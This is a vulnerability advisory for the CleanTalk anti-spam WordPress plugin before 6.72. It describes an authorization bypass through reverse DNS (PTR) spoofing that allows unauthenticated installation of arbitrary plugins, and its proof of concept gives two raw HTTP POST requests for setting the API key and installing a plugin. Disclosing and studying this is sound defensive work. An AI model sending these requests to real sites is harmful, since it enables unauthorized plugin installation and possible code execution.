Spam protection, Honeypot, Anti-Spam by CleanTalk < 6.72 – Unauthenticated Arbitrary Plugin Installation | CVE 2026-1490

Description

The plugin is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. Note: This is only exploitable on sites with an invalid API key, and the plugins to be installed can only be non closed ones from wordpress.org

Proof of Concept

From a host with the PTR record of netserv3.cleantalk.org or netserv4.cleantalk.org

POST / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

spbc_remote_call_action=post_api_key&api_key=XXXXX&plugin_name=apbct

Then use that API key to install/activate plugin via

POST /?plugin=test/test.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

spbc_remote_call_token=YYYYYY&spbc_remote_call_action=install_plugin&plugin_name=apbct